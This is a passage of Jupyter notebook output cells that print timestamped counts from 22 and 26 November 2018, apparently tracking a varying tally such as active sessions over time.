"['2018-11-26 17:17:54.004283', 9]\n",
"['2018-11-26 17:18:46.798423', 10]\n",
"['2018-11-26 17:20:07.468584', 9]\n",
"['2018-11-26 17:20:43.400378', 10]\n",
"['2018-11-26 17:21:28.990073', 11]\n",
"['2018-11-26 17:22:52.459680', 10]\n",
"['2018-11-26 17:23:12.340879', 9]\n",
"['2018-11-26 17:23:44.133882', 10]\n",
"['2018-11-26 17:24:03.399498', 11]\n",
"['2018-11-26 17:24:10.953782', 10]\n",
"['2018-11-26 17:24:24.173909', 9]\n",
"['2018-11-26 17:24:25.486696', 10]\n",
"['2018-11-26 17:24:54.204494', 9]\n",
"['2018-11-26 17:25:14.603539', 10]\n",
"['2018-11-26 17:25:20.466988', 11]\n",
"['2018-11-26 17:25:37.774874', 12]\n",
"['2018-11-26 17:25:52.129183', 13]\n",
"['2018-11-26 17:25:53.227562', 14]\n",
"['2018-11-26 17:25:59.622604', 15]\n",
"['2018-11-26 17:26:08.639112', 16]\n",
"['2018-11-26 17:26:54.314013', 15]\n",
"['2018-11-26 17:28:06.312632', 14]\n",
"['2018-11-26 17:28:09.429994', 15]\n",
"['2018-11-26 17:28:17.714375', 16]\n",
"['2018-11-26 17:28:55.178721', 15]\n",
"['2018-11-26 17:28:55.555772', 16]\n",
"['2018-11-26 17:29:07.452818', 15]\n",
"['2018-11-26 17:29:18.628659', 14]\n",
"['2018-11-26 17:29:52.482479', 13]\n",
"['2018-11-26 17:30:10.360564', 12]\n",
"['2018-11-26 17:30:14.133738', 13]\n",
"['2018-11-26 17:30:20.712711', 14]\n",
"['2018-11-26 17:30:25.185505', 15]\n",
"['2018-11-26 17:30:45.480882', 14]\n",
"['2018-11-26 17:30:48.868603', 15]\n",
"['2018-11-26 17:30:51.433247', 16]\n",
"['2018-11-26 17:30:55.200217', 17]\n",
"['2018-11-26 17:31:09.646967', 18]\n",
"['2018-11-26 17:31:13.273158', 19]\n",
"['2018-11-26 17:31:32.110927', 20]\n",
"['2018-11-26 17:31:37.842269', 19]\n",
"['2018-11-26 17:31:39.705887', 20]\n",
"['2018-11-26 17:31:45.719667', 21]\n",
"['2018-11-26 17:31:47.638801', 22]\n",
"['2018-11-26 17:32:10.240173', 21]\n",
"['2018-11-26 17:32:18.564597', 20]\n",
"['2018-11-26 17:32:56.089335', 19]\n",
"['2018-11-26 17:33:02.052082', 20]\n",
"['2018-11-26 17:33:58.606003', 19]\n",
"['2018-11-26 17:34:18.202364', 18]\n",
"['2018-11-26 17:34:29.456691', 19]\n",
"['2018-11-26 17:35:25.495170', 18]\n",
"['2018-11-26 17:35:54.393301', 19]\n",
"['2018-11-26 17:36:10.902870', 18]\n",
"['2018-11-26 17:36:16.460804', 19]\n",
"['2018-11-26 17:36:16.557952', 20]\n",
"['2018-11-26 17:36:36.468662', 19]\n",
"['2018-11-26 17:36:36.896054', 18]\n",
"['2018-11-26 17:36:45.760918', 17]\n",
"['2018-11-26 17:36:56.486751', 16]\n",
"['2018-11-26 17:37:03.127622', 15]\n",
"['2018-11-26 17:37:06.933459', 14]\n",
"['2018-11-26 17:37:31.624500', 11]\n",
"['2018-11-26 17:38:34.384098', 9]\n",
"['2018-11-26 17:40:02.302582', 8]\n",
"['2018-11-26 17:40:13.958328', 9]\n",
"['2018-11-26 17:40:14.551393', 10]\n",
"['2018-11-26 17:46:28.346785', 2]\n",
"['2018-11-26 17:48:43.335953', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 18:01:24.096415', 2]\n",
"['2018-11-26 18:03:29.064194', 3]\n",
"['2018-11-26 18:08:26.440229', 4]\n",
"['2018-11-26 18:08:35.745797', 5]\n",
"['2018-11-26 18:10:25.033728', 6]\n",
"['2018-11-26 18:11:25.877110', 5]\n",
"['2018-11-26 18:12:13.106242', 6]\n",
"['2018-11-26 18:12:49.905359', 7]\n",
"['2018-11-26 18:13:31.192034', 8]\n",
"['2018-11-26 18:13:34.077057', 9]\n",
"['2018-11-26 18:13:43.829846', 10]\n",
"['2018-11-26 18:13:54.972905', 11]\n",
"['2018-11-26 18:14:01.332090', 12]\n",
"['2018-11-26 18:14:06.518042', 13]\n",
"['2018-11-26 18:14:08.161587', 14]\n",
"['2018-11-26 18:14:53.873278', 15]\n",
"['2018-11-26 18:14:58.210567', 16]\n",
"['2018-11-26 18:15:26.313347', 17]\n",
"['2018-11-26 18:15:26.424544', 18]\n",
"['2018-11-26 18:15:32.987615', 19]\n",
"['2018-11-26 18:16:01.710873', 20]\n",
"['2018-11-26 18:16:20.692275', 21]\n",
"['2018-11-26 18:16:34.534253', 22]\n",
"['2018-11-26 18:17:00.237128', 21]\n",
"['2018-11-26 18:17:34.461833', 19]\n",
"['2018-11-26 18:17:54.683300', 18]\n",
"['2018-11-26 18:18:10.000570', 19]\n",
"['2018-11-26 18:18:11.924564', 20]\n",
"['2018-11-26 18:18:16.564629', 19]\n",
"['2018-11-26 18:18:20.956612', 18]\n",
"['2018-11-26 18:18:43.636939', 19]\n",
"['2018-11-26 18:18:54.513010', 18]\n",
"['2018-11-26 18:19:11.483136', 16]\n",
"['2018-11-26 18:19:24.787809', 17]\n",
"['2018-11-26 18:19:28.626583', 15]\n",
"['2018-11-26 18:19:30.386000', 16]\n",
"['2018-11-26 18:19:33.170052', 15]\n",
"['2018-11-26 18:19:53.152654', 16]\n",
"['2018-11-26 18:20:03.848409', 14]\n",
"['2018-11-26 18:20:07.155954', 13]\n",
"['2018-11-26 18:20:17.149342', 12]\n",
"['2018-11-26 18:20:21.590675', 11]\n",
"['2018-11-26 18:20:39.664261', 10]\n",
"['2018-11-26 18:20:52.662570', 11]\n",
"['2018-11-26 18:21:11.042830', 12]\n",
"['2018-11-26 18:21:23.668019', 13]\n",
"['2018-11-26 18:21:29.249455', 14]\n",
"['2018-11-26 18:21:45.940449', 15]\n",
"['2018-11-26 18:22:03.451917', 14]\n",
"['2018-11-26 18:23:02.066900', 13]\n",
"['2018-11-26 18:23:12.600038', 12]\n",
"['2018-11-26 18:23:31.591325', 13]\n",
"['2018-11-26 18:24:02.372238', 14]\n",
"['2018-11-26 18:24:23.970849', 13]\n",
"['2018-11-26 18:24:31.923558', 11]\n",
"['2018-11-26 18:24:55.498144', 10]\n",
"['2018-11-26 18:25:25.581184', 8]\n",
"['2018-11-26 18:26:27.178142', 6]\n",
"['2018-11-26 18:26:39.739455', 7]\n",
"['2018-11-26 18:29:39.323694', 8]\n",
"['2018-11-26 18:29:46.247383', 9]\n",
"['2018-11-26 18:29:56.252990', 8]\n",
"['2018-11-26 18:31:40.871033', 9]\n",
"['2018-11-26 18:32:59.787254', 8]\n",
"['2018-11-26 18:33:06.794662', 9]\n",
"['2018-11-26 18:33:41.100554', 8]\n",
"['2018-11-26 18:34:00.709543', 7]\n",
"['2018-11-26 18:34:23.377321', 8]\n",
"['2018-11-26 18:35:42.038420', 7]\n",
"['2018-11-26 18:37:16.715315', 8]\n",
"['2018-11-26 18:38:30.611391', 7]\n",
"['2018-11-26 18:40:50.061901', 6]\n",
"['2018-11-26 18:43:15.701926', 5]\n",
"['2018-11-26 18:50:19.268418', 2]\n",
"['2018-11-26 18:50:52.887571', 3]\n",
"['2018-11-26 18:52:58.549583', 4]\n",
"['2018-11-26 18:53:12.800758', 5]\n",
"['2018-11-26 18:55:02.695515', 4]\n",
"['2018-11-26 18:55:07.631958', 5]\n",
"['2018-11-26 18:55:36.451283', 6]\n",
"['2018-11-26 18:56:12.168087', 7]\n",
"['2018-11-26 18:57:29.331427', 6]\n",
"['2018-11-26 19:01:53.888133', 5]\n",
"['2018-11-26 19:03:27.619603', 4]\n",
"['2018-11-26 19:05:12.849597', 3]\n",
"['2018-11-26 19:06:52.890554', 4]\n",
"['2018-11-26 19:06:59.544459', 5]\n",
"['2018-11-26 19:09:02.956070', 6]\n",
"['2018-11-26 19:10:32.735716', 7]\n",
"['2018-11-26 19:11:03.085943', 6]\n",
"['2018-11-26 19:11:16.056336', 7]\n",
"['2018-11-26 19:12:05.316507', 6]\n",
"['2018-11-26 19:13:21.900992', 7]\n",
"['2018-11-26 19:13:23.193855', 8]\n",
"['2018-11-26 19:14:56.991180', 7]\n",
"['2018-11-26 19:15:11.290250', 8]\n",
"['2018-11-26 19:15:20.133098', 7]\n",
"['2018-11-26 19:17:08.906646', 6]\n",
"['2018-11-26 19:18:43.146773', 5]\n",
"['2018-11-26 19:20:05.413170', 4]\n",
"['2018-11-26 19:20:15.156408', 3]\n",
"['2018-11-26 19:20:34.672434', 4]\n",
"['2018-11-26 19:20:47.141196', 5]\n",
"['2018-11-26 19:23:19.944951', 6]\n",
"['2018-11-26 19:23:31.098940', 7]\n",
"['2018-11-26 19:25:08.085826', 5]\n",
"['2018-11-26 19:26:44.121725', 6]\n",
"['2018-11-26 19:26:58.534655', 7]\n",
"['2018-11-26 19:27:46.618010', 8]\n",
"['2018-11-26 19:27:52.609224', 9]\n",
"['2018-11-26 19:28:43.156246', 10]\n",
"['2018-11-26 19:28:55.625900', 11]\n",
"['2018-11-26 19:29:37.069819', 12]\n",
"['2018-11-26 19:29:52.069994', 11]\n",
"['2018-11-26 19:30:47.430740', 12]\n",
"['2018-11-26 19:31:18.065742', 10]\n",
"['2018-11-26 19:31:20.695584', 11]\n",
"['2018-11-26 19:31:21.924597', 12]\n",
"['2018-11-26 19:31:33.283214', 13]\n",
"['2018-11-26 19:31:42.867288', 14]\n",
"['2018-11-26 19:31:54.071222', 13]\n",
"['2018-11-26 19:32:30.221767', 14]\n",
"['2018-11-26 19:33:31.618630', 13]\n",
"['2018-11-26 19:35:50.649396', 10]\n",
"['2018-11-26 19:36:02.371703', 9]\n",
"['2018-11-26 19:36:17.291141', 10]\n",
"['2018-11-26 19:36:29.632571', 11]\n",
"['2018-11-26 19:36:32.289710', 10]\n",
"['2018-11-26 19:37:06.386970', 7]\n",
"['2018-11-26 19:37:17.460805', 6]\n",
"['2018-11-26 19:38:20.019892', 5]\n",
"['2018-11-26 19:40:45.902458', 3]\n",
"['2018-11-26 19:40:52.702438', 4]\n",
"['2018-11-26 19:45:44.139332', 3]\n",
"['2018-11-26 19:58:47.273634', 2]\n",
"['2018-11-26 20:07:53.347724', 3]\n",
"['2018-11-26 20:08:36.526200', 4]\n",
"['2018-11-26 20:11:37.543015', 5]\n",
"['2018-11-26 20:12:31.320339', 3]\n",
"['2018-11-26 20:13:02.440980', 4]\n",
"['2018-11-26 20:13:10.386109', 5]\n",
"['2018-11-26 20:13:16.845939', 6]\n",
"['2018-11-26 20:13:19.235148', 7]\n",
"['2018-11-26 20:13:24.891506', 8]\n",
"['2018-11-26 20:13:33.155185', 9]\n",
"['2018-11-26 20:13:44.356444', 10]\n",
"['2018-11-26 20:13:59.993311', 11]\n",
"['2018-11-26 20:14:03.713450', 12]\n",
"['2018-11-26 20:14:07.109158', 13]\n",
"['2018-11-26 20:14:36.382278', 14]\n",
"['2018-11-26 20:14:48.774502', 15]\n",
"['2018-11-26 20:15:06.027104', 16]\n",
"['2018-11-26 20:15:08.188717', 17]\n",
"['2018-11-26 20:15:38.075198', 18]\n",
"['2018-11-26 20:16:03.495128', 17]\n",
"['2018-11-26 20:16:12.457156', 18]\n",
"['2018-11-26 20:16:19.321169', 19]\n",
"['2018-11-26 20:16:19.986800', 20]\n",
"['2018-11-26 20:16:22.818194', 21]\n",
"['2018-11-26 20:17:08.335373', 20]\n",
"['2018-11-26 20:18:35.726452', 21]\n",
"['2018-11-26 20:18:37.376314', 22]\n",
"['2018-11-26 20:18:45.726935', 23]\n",
"['2018-11-26 20:18:49.887808', 24]\n",
"['2018-11-26 20:18:58.605992', 22]\n",
"['2018-11-26 20:19:01.755150', 21]\n",
"['2018-11-26 20:19:14.995854', 20]\n",
"['2018-11-26 20:19:17.664289', 19]\n",
"['2018-11-26 20:19:38.170214', 18]\n",
"['2018-11-26 20:19:54.263434', 17]\n",
"['2018-11-26 20:20:13.088578', 12]\n",
"['2018-11-26 20:20:30.435839', 8]\n",
"['2018-11-26 20:20:44.197866', 9]\n",
"['2018-11-26 20:20:44.953711', 10]\n",
"['2018-11-26 20:20:55.075514', 11]\n",
"['2018-11-26 20:20:57.362924', 12]\n",
"['2018-11-26 20:21:24.320515', 13]\n",
"['2018-11-26 20:21:32.963935', 14]\n",
"['2018-11-26 20:22:30.008915', 15]\n",
"['2018-11-26 20:22:32.109369', 16]\n",
"['2018-11-26 20:22:32.709941', 17]\n",
"['2018-11-26 20:23:29.153734', 16]\n",
"['2018-11-26 20:23:46.593453', 14]\n",
"['2018-11-26 20:23:48.643134', 15]\n",
"['2018-11-26 20:23:59.973408', 14]\n",
"['2018-11-26 20:25:00.790470', 11]\n",
"['2018-11-26 20:25:34.228993', 8]\n",
"['2018-11-26 20:25:39.675729', 7]\n",
"['2018-11-26 20:26:36.777721', 5]\n",
"['2018-11-26 20:26:58.186284', 4]\n",
"['2018-11-26 20:28:09.200302', 5]\n",
"['2018-11-26 20:28:12.893659', 6]\n",
"['2018-11-26 20:29:12.757808', 7]\n",
"['2018-11-26 20:32:14.410908', 6]\n",
"['2018-11-26 20:33:24.420582', 4]\n",
"['2018-11-26 20:34:34.936542', 5]\n",
"['2018-11-26 20:38:47.784026', 4]\n",
"['2018-11-26 20:39:21.073957', 3]\n",
"['2018-11-26 20:40:58.782823', 4]\n",
"['2018-11-26 20:43:36.035233', 5]\n",
"['2018-11-26 20:44:05.124707', 6]\n",
"['2018-11-26 20:45:01.459639', 4]\n",
"['2018-11-26 20:45:36.028006', 5]\n",
"['2018-11-26 20:45:54.827413', 6]\n",
"['2018-11-26 20:46:40.317467', 7]\n",
"['2018-11-26 20:47:18.647675', 8]\n",
"['2018-11-26 20:49:42.916002', 6]\n",
"['2018-11-26 20:54:03.125238', 7]\n",
"['2018-11-26 20:55:18.711795', 8]\n",
"['2018-11-26 20:58:18.002541', 7]\n",
"['2018-11-26 20:59:44.167066', 6]\n",
"['2018-11-26 21:00:26.835798', 5]\n",
"['2018-11-26 21:03:55.927040', 4]\n",
"['2018-11-26 21:05:18.070575', 5]\n",
"['2018-11-26 21:05:56.705158', 4]\n",
"['2018-11-26 21:06:07.781294', 5]\n",
"['2018-11-26 21:06:07.836497', 6]\n",
"['2018-11-26 21:06:13.916250', 7]\n",
"['2018-11-26 21:06:27.832650', 8]\n",
"['2018-11-26 21:06:54.018034', 9]\n",
"['2018-11-26 21:06:58.985656', 8]\n",
"['2018-11-26 21:07:02.768172', 9]\n",
"['2018-11-26 21:07:40.812118', 8]\n",
"['2018-11-26 21:07:41.918337', 9]\n",
"['2018-11-26 21:07:58.529452', 10]\n",
"['2018-11-26 21:09:13.790858', 11]\n",
"['2018-11-26 21:09:43.003747', 12]\n",
"['2018-11-26 21:09:57.099245', 13]\n",
"['2018-11-26 21:10:09.932388', 11]\n",
"['2018-11-26 21:10:16.836051', 12]\n",
"['2018-11-26 21:10:17.324229', 13]\n",
"['2018-11-26 21:10:22.765627', 11]\n",
"['2018-11-26 21:10:29.181564', 10]\n",
"['2018-11-26 21:10:42.304233', 11]\n",
"['2018-11-26 21:10:52.740814', 12]\n",
"['2018-11-26 21:14:48.583128', 3]\n",
"['2018-11-26 21:14:54.755398', 2]\n",
"['2018-11-26 21:14:56.803923', 1]\n",
"['2018-11-26 21:15:08.237852', 2]\n",
"['2018-11-26 21:17:30.044865', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 05:41:49.424676', 4]\n",
"['2018-11-22 05:42:18.607787', 5]\n",
"['2018-11-22 05:43:03.278484', 6]\n",
"['2018-11-22 05:43:14.529274', 7]\n",
"['2018-11-22 05:43:30.461316', 8]\n",
"['2018-11-22 05:49:39.295149', 4]\n",
"['2018-11-22 06:07:55.424452', 5]\n",
"['2018-11-22 06:10:02.365760', 6]\n",
"['2018-11-22 06:12:13.700123', 7]\n",
"['2018-11-22 06:12:19.074772', 8]\n",
"['2018-11-22 06:12:25.085412', 9]\n",
"['2018-11-22 06:12:34.973520', 10]\n",
"['2018-11-22 06:12:47.324218', 11]\n",
"['2018-11-22 06:13:13.056737', 10]\n",
"['2018-11-22 06:13:38.253178', 11]\n",
"['2018-11-22 06:13:58.499628', 12]\n",
"['2018-11-22 06:14:04.523715', 11]\n",
"['2018-11-22 06:14:38.206361', 12]\n",
"['2018-11-22 06:16:05.381304', 13]\n",
"['2018-11-22 06:17:23.037835', 11]\n",
"['2018-11-22 06:20:01.307178', 8]\n",
"['2018-11-22 06:20:05.913585', 7]\n",
"['2018-11-22 06:24:09.175247', 5]\n",
"['2018-11-22 06:30:12.240895', 4]\n",
"['2018-11-22 06:39:18.496998', 5]\n",
"['2018-11-22 06:40:21.148194', 4]\n",
"['2018-11-22 06:40:35.016586', 5]\n",
"['2018-11-22 06:50:30.589280', 4]\n",
"['2018-11-22 06:57:47.358202', 5]\n",
"['2018-11-22 06:59:22.632457', 6]\n",
"['2018-11-22 06:59:25.212477', 7]\n",
"['2018-11-22 07:04:31.633821', 5]\n",
"['2018-11-22 07:04:54.396753', 6]\n",
"['2018-11-22 07:05:27.935746', 7]\n",
"['2018-11-22 07:05:29.781721', 8]\n",
"['2018-11-22 07:05:40.300064', 9]\n",
"['2018-11-22 07:05:41.546493', 10]\n",
"['2018-11-22 07:05:47.565033', 11]\n",
"['2018-11-22 07:05:58.531375', 12]\n",
"['2018-11-22 07:06:01.859989', 13]\n",
"['2018-11-22 07:06:18.625868', 14]\n",
"['2018-11-22 07:06:22.042752', 15]\n",
"['2018-11-22 07:06:25.113995', 16]\n",
"['2018-11-22 07:06:50.679288', 17]\n",
"['2018-11-22 07:06:53.896605', 18]\n",
"['2018-11-22 07:07:08.490923', 19]\n",
"['2018-11-22 07:07:12.113477', 20]\n",
"['2018-11-22 07:07:19.313335', 21]\n",
"['2018-11-22 07:07:33.363635', 22]\n",
"['2018-11-22 07:07:51.461701', 23]\n",
"['2018-11-22 07:08:06.528681', 24]\n",
"['2018-11-22 07:08:19.665602', 25]\n",
"['2018-11-22 07:08:42.723113', 26]\n",
"['2018-11-22 07:09:24.053606', 27]\n",
"['2018-11-22 07:09:24.981731', 28]\n",
"['2018-11-22 07:09:33.592126', 29]\n",
"['2018-11-22 07:10:51.595594', 27]\n",
"['2018-11-22 07:11:18.756848', 25]\n",
"['2018-11-22 07:12:03.109424', 24]\n",
"['2018-11-22 07:12:17.938549', 23]\n",
"['2018-11-22 07:12:47.980885', 21]\n",
"['2018-11-22 07:12:58.714003', 20]\n",
"['2018-11-22 07:13:05.211277', 19]\n",
"['2018-11-22 07:13:37.936283', 18]\n",
"['2018-11-22 07:13:38.629665', 17]\n",
"['2018-11-22 07:13:58.443574', 15]\n",
"['2018-11-22 07:14:14.711651', 16]\n",
"['2018-11-22 07:14:43.669301', 15]\n",
"['2018-11-22 07:15:14.878217', 11]\n",
"['2018-11-22 07:15:23.282166', 10]\n",
"['2018-11-22 07:16:26.379358', 9]\n",
"['2018-11-22 07:17:41.385382', 10]\n",
"['2018-11-22 07:18:50.112383', 8]\n",
"['2018-11-22 07:18:59.164829', 7]\n",
"['2018-11-22 07:19:49.522411', 6]\n",
"['2018-11-22 07:22:37.914772', 3]\n",
"['2018-11-22 07:22:42.424425', 4]\n",
"['2018-11-22 07:35:22.237975', 3]\n",
"['2018-11-22 07:39:14.581053', 4]\n",
"['2018-11-22 07:40:35.094367', 5]\n",
"['2018-11-22 07:43:00.667395', 6]\n",
"['2018-11-22 07:43:37.852870', 7]\n",
"['2018-11-22 07:44:02.653435', 8]\n",
"['2018-11-22 07:44:19.013294', 9]\n",
"['2018-11-22 07:45:06.362475', 10]\n",
"['2018-11-22 07:47:05.018377', 9]\n",
"['2018-11-22 07:47:40.800231', 10]\n",
"['2018-11-22 07:49:02.396985', 11]\n",
"['2018-11-22 07:49:06.806156', 12]\n",
"['2018-11-22 07:50:22.480764', 11]\n",
"['2018-11-22 07:50:40.779359', 12]\n",
"['2018-11-22 07:52:30.222181', 13]\n",
"['2018-11-22 07:52:40.258447', 14]\n",
"['2018-11-22 07:54:19.598305', 15]\n",
"['2018-11-22 07:55:07.604522', 16]\n",
"['2018-11-22 07:55:40.877043', 17]\n",
"['2018-11-22 07:56:06.605487', 18]\n",
"['2018-11-22 07:56:23.404287', 17]\n",
"['2018-11-22 07:56:52.562422', 16]\n",
"['2018-11-22 07:57:09.057794', 17]\n",
"['2018-11-22 07:57:23.291867', 18]\n",
"['2018-11-22 07:57:41.757979', 17]\n",
"['2018-11-22 07:57:55.605806', 16]\n",
"['2018-11-22 07:58:22.585104', 15]\n",
"['2018-11-22 07:58:41.599257', 16]\n",
"['2018-11-22 07:58:48.737072', 17]\n",
"['2018-11-22 07:58:49.926930', 18]\n",
"['2018-11-22 07:59:07.926575', 17]\n",
"['2018-11-22 08:00:04.866727', 16]\n",
"['2018-11-22 08:01:12.626656', 17]\n",
"['2018-11-22 08:01:19.872993', 16]\n",
"['2018-11-22 08:02:16.185196', 17]\n",
"['2018-11-22 08:03:22.634865', 16]\n",
"['2018-11-22 08:03:30.089005', 17]\n",
"['2018-11-22 08:03:56.599375', 15]\n",
"['2018-11-22 08:04:37.092474', 16]\n",
"['2018-11-22 08:04:39.273518', 17]\n",
"['2018-11-22 08:05:02.211510', 16]\n",
"['2018-11-22 08:05:12.323930', 17]\n",
"['2018-11-22 08:05:19.135973', 18]\n",
"['2018-11-22 08:06:37.359164', 15]\n",
"['2018-11-22 08:06:38.053764', 16]\n",
"['2018-11-22 08:06:43.294850', 17]\n",
"['2018-11-22 08:06:46.317048', 16]\n",
"['2018-11-22 08:06:49.820540', 17]\n",
"['2018-11-22 08:06:51.337618', 18]\n",
"['2018-11-22 08:06:55.079731', 19]\n",
"['2018-11-22 08:06:55.901997', 18]\n",
"['2018-11-22 08:07:01.384418', 19]\n",
"['2018-11-22 08:07:10.305510', 20]\n",
"['2018-11-22 08:07:28.297669', 19]\n",
"['2018-11-22 08:07:40.884067', 20]\n",
"['2018-11-22 08:07:58.074945', 19]\n",
"['2018-11-22 08:08:28.007202', 18]\n",
"['2018-11-22 08:08:37.992708', 17]\n",
"['2018-11-22 08:08:49.965755', 18]\n",
"['2018-11-22 08:08:57.719007', 19]\n",
"['2018-11-22 08:09:42.454012', 20]\n",
"['2018-11-22 08:09:51.744838', 19]\n",
"['2018-11-22 08:09:56.186040', 18]\n",
"['2018-11-22 08:10:02.763589', 17]\n",
"['2018-11-22 08:10:12.618465', 18]\n",
"['2018-11-22 08:10:32.172647', 19]\n",
"['2018-11-22 08:11:19.751337', 20]\n",
"['2018-11-22 08:12:20.356410', 19]\n",
"['2018-11-22 08:13:04.227353', 18]\n",
"['2018-11-22 08:13:21.086419', 19]\n",
"['2018-11-22 08:13:33.918954', 17]\n",
"['2018-11-22 08:13:47.079819', 15]\n",
"['2018-11-22 08:14:01.090813', 14]\n",
"['2018-11-22 08:14:01.491676', 15]\n",
"['2018-11-22 08:14:08.927053', 12]\n",
"['2018-11-22 08:14:47.407473', 10]\n",
"['2018-11-22 08:14:49.253417', 11]\n",
"['2018-11-22 08:15:01.054895', 10]\n",
"['2018-11-22 08:15:32.723361', 9]\n",
"['2018-11-22 08:16:36.626655', 10]\n",
"['2018-11-22 08:16:48.446089', 11]\n",
"['2018-11-22 08:16:50.562923', 12]\n",
"['2018-11-22 08:18:01.094074', 11]\n",
"['2018-11-22 08:18:22.824436', 10]\n",
"['2018-11-22 08:18:24.894581', 11]\n",
"['2018-11-22 08:19:04.344294', 10]\n",
"['2018-11-22 08:19:05.158286', 11]\n",
"['2018-11-22 08:19:05.728606', 12]\n",
"['2018-11-22 08:19:39.019620', 13]\n",
"['2018-11-22 08:22:24.284645', 8]\n",
"['2018-11-22 08:23:18.126679', 5]\n",
"['2018-11-22 08:24:20.453614', 6]\n",
"['2018-11-22 08:24:27.142150', 7]\n",
"['2018-11-22 08:25:27.474795', 6]\n",
"['2018-11-22 08:37:37.200225', 3]\n",
"['2018-11-22 08:53:27.564511', 4]\n",
"['2018-11-22 08:53:28.366813', 5]\n",
"['2018-11-22 08:54:00.515396', 6]\n",
"['2018-11-22 08:54:43.071632', 7]\n",
"['2018-11-22 08:55:14.248731', 8]\n",
"['2018-11-22 08:55:16.289864', 9]\n",
"['2018-11-22 08:55:25.123639', 10]\n",
"['2018-11-22 08:56:48.267047', 11]\n",
"['2018-11-22 08:57:31.440387', 10]\n",
"['2018-11-22 08:59:39.712021', 11]\n",
"['2018-11-22 08:59:39.772058', 12]\n",
"['2018-11-22 08:59:54.882223', 13]\n",
"['2018-11-22 09:00:22.589443', 14]\n",
"['2018-11-22 09:01:00.317811', 13]\n",
"['2018-11-22 09:02:57.150253', 12]\n",
"['2018-11-22 09:03:02.585902', 10]\n",
"['2018-11-22 09:03:38.191946', 11]\n",
"['2018-11-22 09:03:46.390013', 12]\n",
"['2018-11-22 09:03:57.432527', 13]\n",
"['2018-11-22 09:04:26.796326', 12]\n",
"['2018-11-22 09:05:27.197112', 10]\n",
"['2018-11-22 09:05:47.267949', 11]\n",
"['2018-11-22 09:06:00.742760', 12]\n",
"['2018-11-22 09:06:02.330283', 13]\n",
"['2018-11-22 09:06:11.064262', 14]\n",
"['2018-11-22 09:06:16.949592', 15]\n",
"['2018-11-22 09:07:00.771161', 16]\n",
"['2018-11-22 09:07:13.070714', 15]\n",
"['2018-11-22 09:07:22.042663', 16]\n",
"['2018-11-22 09:08:07.059070', 15]\n",
"['2018-11-22 09:08:18.262376', 16]\n",
"['2018-11-22 09:08:19.656444', 17]\n",
"['2018-11-22 09:09:01.035465', 18]\n",
"['2018-11-22 09:09:23.925026', 19]\n",
"['2018-11-22 09:09:28.944162', 18]\n",
"['2018-11-22 09:09:45.423767', 19]\n",
"['2018-11-22 09:10:00.828070', 18]\n",
"['2018-11-22 09:10:05.297527', 16]\n",
"['2018-11-22 09:10:23.317729', 17]\n",
"['2018-11-22 09:10:45.825092', 16]\n",
"['2018-11-22 09:10:55.646246', 17]\n",
"['2018-11-22 09:11:02.097115', 16]\n",
"['2018-11-22 09:11:13.217351', 15]\n",
"['2018-11-22 09:11:13.978584', 16]\n",
"['2018-11-22 09:11:54.234229', 14]\n",
"['2018-11-22 09:12:24.266862', 13]\n",
"['2018-11-22 09:13:12.464797', 12]\n",
"['2018-11-22 09:14:24.362628', 11]\n",
"['2018-11-22 09:14:44.882107', 10]\n",
"['2018-11-22 09:15:08.022205', 8]\n",
"['2018-11-22 09:15:26.428311', 6]\n",
"['2018-11-22 09:15:50.436071', 7]\n",
"['2018-11-22 09:16:24.469093', 8]\n",
"['2018-11-22 09:17:06.904191', 9]\n",
"['2018-11-22 09:17:36.904153', 8]\n",
"['2018-11-22 09:17:42.265749', 9]\n",
"['2018-11-22 09:18:06.904043', 8]\n",
"['2018-11-22 09:19:21.602278', 9]\n",
"['2018-11-22 09:19:43.326904', 10]\n",
"['2018-11-22 09:19:57.197692', 9]\n",
"['2018-11-22 09:20:36.903680', 7]\n",
"['2018-11-22 09:21:06.903581', 6]\n",
"['2018-11-22 09:21:32.409922', 7]\n",
"['2018-11-22 09:23:29.163208', 6]\n",
"['2018-11-22 09:23:44.599911', 5]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:24:29.599609', 4]\n",
"['2018-11-22 09:37:44.187051', 3]\n",
"['2018-11-22 09:38:25.138779', 4]\n",
"['2018-11-22 09:50:10.981066', 3]\n",
"['2018-11-22 09:51:20.588892', 4]\n",
"['2018-11-22 09:52:17.438122', 5]\n",
"['2018-11-22 09:52:43.583283', 6]\n",
"['2018-11-22 09:54:12.433215', 5]\n",
"['2018-11-22 09:56:55.903953', 6]\n",
"['2018-11-22 09:57:09.457822', 5]\n",
"['2018-11-22 09:58:04.099877', 6]\n",
"['2018-11-22 09:58:44.040860', 7]\n",
"['2018-11-22 09:59:15.343427', 8]\n",
"['2018-11-22 10:00:00.730174', 7]\n",
"['2018-11-22 10:00:35.283861', 8]\n",
"['2018-11-22 10:00:38.627234', 9]\n",
"['2018-11-22 10:01:15.786490', 10]\n",
"['2018-11-22 10:01:21.404250', 11]\n",
"['2018-11-22 10:01:50.230716', 12]\n",
"['2018-11-22 10:01:55.332512', 13]\n",
"['2018-11-22 10:02:05.073373', 12]\n",
"['2018-11-22 10:02:06.729515', 13]\n",
"['2018-11-22 10:02:26.976513', 14]\n",
"['2018-11-22 10:02:49.056352', 15]\n",
"['2018-11-22 10:03:22.079667', 14]\n",
"['2018-11-22 10:03:45.156106', 15]\n",
"['2018-11-22 10:04:02.128523', 16]\n",
"['2018-11-22 10:04:06.914095', 17]\n",
"['2018-11-22 10:04:08.253558', 18]\n",
"['2018-11-22 10:04:43.694682', 19]\n",
"['2018-11-22 10:05:06.913459', 18]\n",
"['2018-11-22 10:05:35.867043', 19]\n",
"['2018-11-22 10:05:52.923833', 18]\n",
"['2018-11-22 10:06:38.980001', 14]\n",
"['2018-11-22 10:06:50.972774', 13]\n",
"['2018-11-22 10:07:50.988435', 12]\n",
"['2018-11-22 10:08:09.037944', 11]\n",
"['2018-11-22 10:08:19.049324', 10]\n",
"['2018-11-22 10:08:39.067591', 9]\n",
"['2018-11-22 10:08:44.246696', 10]\n",
"['2018-11-22 10:08:48.300229', 11]\n",
"['2018-11-22 10:08:49.701482', 12]\n",
"['2018-11-22 10:08:50.403105', 13]\n",
"['2018-11-22 10:08:58.779299', 14]\n",
"['2018-11-22 10:09:01.496470', 15]\n",
"['2018-11-22 10:09:08.971582', 14]\n",
"['2018-11-22 10:09:15.839427', 13]\n",
"['2018-11-22 10:09:19.308127', 14]\n",
"['2018-11-22 10:09:31.162083', 15]\n",
"['2018-11-22 10:09:34.253436', 16]\n",
